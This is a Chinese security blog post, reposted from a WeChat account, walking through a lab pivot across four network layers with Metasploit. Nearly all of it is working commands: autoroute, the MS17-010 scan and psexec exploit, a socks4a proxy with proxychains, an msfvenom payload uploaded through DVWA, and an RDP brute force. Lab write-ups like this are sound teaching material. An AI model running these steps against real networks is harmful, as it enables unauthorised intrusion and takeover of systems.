新秀# 原创

使用msf入侵多层级网络架构

文章来源:微信公众号Bypass

假设,有一个多层网络环境结构,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本去获取Server5(10.0.3.2)的系统权限呢?

19306-x815kp4lmip.png

首先,我们通过Web入侵获得Server1权限,并通过横向渗透到Server2,探测到Server2存在双网卡。在这里,我们以Server2作为攻击跳板机继续入侵。

第1层靶机→第2靶机
1、获取内网网段信息

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.0.0.0/255.255.255.0
Local subnet: 10.0.1.0/255.255.255.0

61195-q4xsyk2by2.png
通过内网本地路由查询,可以获悉内网网段地址为:10.0.1.0/24。
2、添加去往第二层内网网段(10.0.1.0/24)的静态路由。

meterpreter > run autoroute -s 10.0.1.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3
[*] Use the -p option to list all active routes

74789-7mesggxw53a.png
3、扫描内网主机,使用msf下的扫描模块对IP段进行扫描看是否存来MS17-010漏洞。

use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 10.0.1.0/24
set threads 50
run
24072-1yxyp6mwing.png
通过扫描发现10.0.1.2存在MS-17010漏洞。
4、通过MS-17010漏洞获取Server3的系统权限。

use exploit/windows/smb/ms17_010_psexec
set rhost 10.0.1.2
set payload windows/meterpreter/bind_tcp
run
27919-er5s5mj85ua.png
成功获取第二层靶机权限,查看ip地址,发现第三个网段。

56638-p36tnk4435i.png
第2层靶机→第3靶机
添加第三个网段的静态理由。

meterpreter > run autoroute -s 10.0.2.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.2.0/255.255.255.0...
[+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2
[*] Use the -p option to list all active routes
94258-zb8jvcmlw4.png
使用MS17-010扫描无果,发现10.0.2.2主机存活,利用msf搭建socks代理

use auxiliary/server/socks4a
set srvport 9999
run

在攻击机Kali中,修改配置文件/etc/proxychains.conf

socks4 10.0.0.2 9999

使用proxychains 对第三层靶机进行端口扫描:

proxychains nmap -Pn -sT 10.0.2.2 -p1-1000
51676-p7ik57s9fen.png
在Firefox中设置socks代理。

47467-st4zqt2zfhi.png

本地就可以直接访问到第三层靶机,在DVWA中,通过任意文件上传msf后门,获取站点权限。

23160-k80pvknk0n8.png

利用msfvenom生成木马后门:

msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 10.0.2.2
set LPORT 8888
set ExitOnSession false
exploit -j -z

在webshell中,上传并成功执行shell.exe,成功返回Server4的权限。
07743-rxc184vfui.png

第3层靶机→第4靶机
添加第四个网段的静态理由。

meterpreter > run autoroute -s 10.0.3.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.3.0/255.255.255.0...
[+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2
[*] Use the -p option to list all active routes

开启socker

use auxiliary/server/socks4a
set srvport 6666
run

探测第四个网段存活的主机,发现10.0.3.2 开放了3389端口。

proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389

将第四层目标主机的3389流量转发到代理服务器中:

04391-wik7gasuot.png

在本地对RDP账号密码进行爆破:

54391-la2p71pwct.png

爆破成功后,使用账号密码成功登录服务器。

42074-06i4ppqb12iw.png

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
【两会提案】关于推动人工智能赋能工业互联网安全发展的提案
« 上一篇 05-29
分享几个默认密码在线查询网站
下一篇 » 06-01

相关推荐

CS4.1真的有后门吗?

文章来源:酒仙桥六号部队前言CS是什么?可能是某款历史久远的第一人称射击游戏,也可能是某个电影。由于法律原因我们这里并不指出CS是什么,但网络江湖上一直流...

微信聊天记录删除了怎么恢复

文章来源:微信公众号BYpass1、使用微信修复工具在微信搜索框输入recover,并点击搜索,找到微信修复工具。故障修复--聊天记录,确认以后开始恢复数...

记一次漏洞挖掘实战之木桶短板

客户给了个站 授权渗透客户要求:纯黑盒 无测试账号就一个登录框 忘记密码功能还是这样人直接傻了 先看看能不能爆破吧发现密码加密了好家伙 还是动态密钥验...

实战-站库分离拿下WebShell

文章来源:重生信息安全作者:海鸥一、目录遍历在对目标进行目录扫描的时候,发现其app目录存在目录遍历。 在目录中发现了app的备份文件,在备份中找到了其数...